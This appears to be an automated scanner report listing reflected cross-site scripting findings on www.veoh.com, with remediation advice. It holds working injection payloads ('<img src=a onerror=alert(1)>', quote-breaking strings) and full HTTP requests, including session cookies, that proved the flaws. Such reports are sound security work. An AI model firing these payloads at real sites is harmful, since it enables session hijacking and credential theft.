Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4b0c<img%20src%3da%20onerror%3dalert(1)>88040cf1d82 was submitted in the REST URL parameter 4. This input was echoed as f4b0c<img src=a onerror=alert(1)>88040cf1d82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuref4b0c<img%20src%3da%20onerror%3dalert(1)>88040cf1d82 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:50 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=80 Content-Length: 57783
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuref4b0c<img src=a onerror=alert(1)>88040cf1d82"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d235"><img%20src%3da%20onerror%3dalert(1)>9e252f7871e was submitted in the REST URL parameter 4. This input was echoed as 9d235"><img src=a onerror=alert(1)>9e252f7871e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure9d235"><img%20src%3da%20onerror%3dalert(1)>9e252f7871e HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:36:46 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=59 Content-Length: 57827
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure9d235"><img src=a onerror=alert(1)>9e252f7871e/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e6c"><img%20src%3da%20onerror%3dalert(1)>96f11e9dd34 was submitted in the REST URL parameter 4. This input was echoed as 71e6c"><img src=a onerror=alert(1)>96f11e9dd34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure71e6c"><img%20src%3da%20onerror%3dalert(1)>96f11e9dd34/watch/v18647177dJ8p2YBE HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:35:23 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=87 Content-Length: 77754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure71e6c"><img src=a onerror=alert(1)>96f11e9dd34/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8fa41<img%20src%3da%20onerror%3dalert(1)>55c9c937f22 was submitted in the REST URL parameter 4. This input was echoed as 8fa41<img src=a onerror=alert(1)>55c9c937f22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure8fa41<img%20src%3da%20onerror%3dalert(1)>55c9c937f22/watch/v18647177dJ8p2YBE HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:36:47 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=65 Content-Length: 77710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure8fa41<img src=a onerror=alert(1)>55c9c937f22"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfc58'%3bc01f25840e4 was submitted in the REST URL parameter 6. This input was echoed as cfc58';c01f25840e4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBEcfc58'%3bc01f25840e4 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:26 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=72 Content-Length: 94329
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbdf3"><img%20src%3da%20onerror%3dalert(1)>42b09b361cc was submitted in the REST URL parameter 4. This input was echoed as fbdf3"><img src=a onerror=alert(1)>42b09b361cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurefbdf3"><img%20src%3da%20onerror%3dalert(1)>42b09b361cc/watch/v189741093prNNZM5 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:16 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=43 Content-Length: 76768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventurefbdf3"><img src=a onerror=alert(1)>42b09b361cc/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8f48<img%20src%3da%20onerror%3dalert(1)>a3fbcd0230a was submitted in the REST URL parameter 4. This input was echoed as f8f48<img src=a onerror=alert(1)>a3fbcd0230a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuref8f48<img%20src%3da%20onerror%3dalert(1)>a3fbcd0230a/watch/v189741093prNNZM5 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:33 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=20 Content-Length: 76724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuref8f48<img src=a onerror=alert(1)>a3fbcd0230a"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22732'%3b900f2443f83 was submitted in the REST URL parameter 6. This input was echoed as 22732';900f2443f83 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v189741093prNNZM522732'%3b900f2443f83 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:44 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=86 Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bef9b"><img%20src%3da%20onerror%3dalert(1)>63733810adb was submitted in the REST URL parameter 4. This input was echoed as bef9b"><img src=a onerror=alert(1)>63733810adb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurebef9b"><img%20src%3da%20onerror%3dalert(1)>63733810adb/watch/v18978294NGnK88j8 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:41 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=94 Content-Length: 76451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventurebef9b"><img src=a onerror=alert(1)>63733810adb/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be275<img%20src%3da%20onerror%3dalert(1)>e6d8963fd9 was submitted in the REST URL parameter 4. This input was echoed as be275<img src=a onerror=alert(1)>e6d8963fd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurebe275<img%20src%3da%20onerror%3dalert(1)>e6d8963fd9/watch/v18978294NGnK88j8 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=97 Content-Length: 76397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurebe275<img src=a onerror=alert(1)>e6d8963fd9"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6a1e'%3b1b1f85b69a1 was submitted in the REST URL parameter 6. This input was echoed as c6a1e';1b1f85b69a1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8c6a1e'%3b1b1f85b69a1 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:49 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=9 Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce45"><img%20src%3da%20onerror%3dalert(1)>b926a16b5e0 was submitted in the REST URL parameter 4. This input was echoed as 5ce45"><img src=a onerror=alert(1)>b926a16b5e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure5ce45"><img%20src%3da%20onerror%3dalert(1)>b926a16b5e0/watch/v18978294NGnK88j8/x22 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=9F8A0036-A353-DB95-6D07-AA38C789D992&LastUpdate=03/Feb/2011:12:31:41 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:41 GMT; Path=/ Date: Thu, 03 Feb 2011 20:31:41 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=16 Content-Length: 76451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure5ce45"><img src=a onerror=alert(1)>b926a16b5e0/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2e455<img%20src%3da%20onerror%3dalert(1)>cd67645eb41 was submitted in the REST URL parameter 4. This input was echoed as 2e455<img src=a onerror=alert(1)>cd67645eb41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure2e455<img%20src%3da%20onerror%3dalert(1)>cd67645eb41/watch/v18978294NGnK88j8/x22 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:55 GMT; Path=/ Date: Thu, 03 Feb 2011 20:31:56 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=87 Content-Length: 76407
